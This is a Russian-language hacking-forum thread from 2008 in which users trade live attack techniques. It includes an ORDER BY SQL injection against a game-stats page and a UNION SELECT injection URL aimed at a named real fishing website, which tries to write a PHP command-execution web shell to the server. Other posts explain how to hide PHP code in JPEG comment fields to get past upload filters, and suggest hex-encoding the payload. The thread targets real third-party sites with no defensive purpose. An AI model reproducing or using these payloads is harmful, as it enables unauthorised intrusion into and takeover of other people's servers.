Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
04.01.2008, 01:41
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Piflit, по ссылке только про xss написано...
Кстати если подставить в "server.php?newcss=styles.css&newtheme=%00" перед %00 любой символ и перейти по адресу, то ошибки не вылетают =\
|
|
|
04.01.2008, 02:22
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Покапался нашел скул после order by
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот.
Да, там точно скул есть.
ssort=(-skill*(1=1))--
обрезание запроса
Последний раз редактировалось AFoST; 04.01.2008 в 02:29..
Причина: точно есть
|
|
|
|
04.01.2008, 02:29
|
|
Познающий
Регистрация: 01.01.2008
Сообщений: 50
Провел на форуме:
187422
Репутация:
71
|
|
Сообщение от AFoST
Счас покапался, типа это наверное скул после ордер бай
player.php?id=11&ssort=(-skill*(-1))&sorder=desc
player.php?id=11&ssort=(-skill)&sorder=desc
Выводятся скиллы упарядоченные от большего к меньшему и наоборот...
Если поддерживаются подзапросы, пробуй сделать слепую иньекцию.
|
|
|
|
04.01.2008, 02:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
угу, плюсенг, но их там полно
__________________
Карфаген должен быть разрушен...
|
|
|
|
04.01.2008, 15:06
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме:
3295822
Репутация:
117
|
|
Всем привет. Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
|
|
|
|
04.01.2008, 15:27
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Про расширения тут глянь:
https://forum.antichat.ru/threadnav23501-1-10.html
дописать php код в какие-то теги
_)))))) В <?php ?> наверно  Открываешь картинку редактором(по вкусу) и дописываешь в конец... |
|
|
|
04.01.2008, 15:56
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Подобрал -
Код HTML:
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,1,2,3+from+user/*
Хочу залить шел -
Код HTML:
http://www.rusfishing.ru/?M=133&id=0&id_=0.015+union+select+0,'%3C?php%20system($_GET[cmd]);%20?%3E',2,3+from+user+into+outfile+'/storage/home/rusfishi/htdocs/1q2w3e.txt'/*
Не получается!
1) В заппосе что то не так или прав на зипись нету?
2) В слепой инжекции можно шел залить?
Последний раз редактировалось trumps; 04.01.2008 в 15:59..
|
|
|
|
04.01.2008, 15:51
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать <?php system($cmd) ?> без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
|
|
|
|
04.01.2008, 16:06
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Всё правильно написано, чтолько вот 0.015 это числа или строка? Чкорее всего нет прав. Ещё перепроверь путь к записываемому файлу.
|
|
|
|
04.01.2008, 16:07
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Cначала в bin2hex попробуй перевести...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид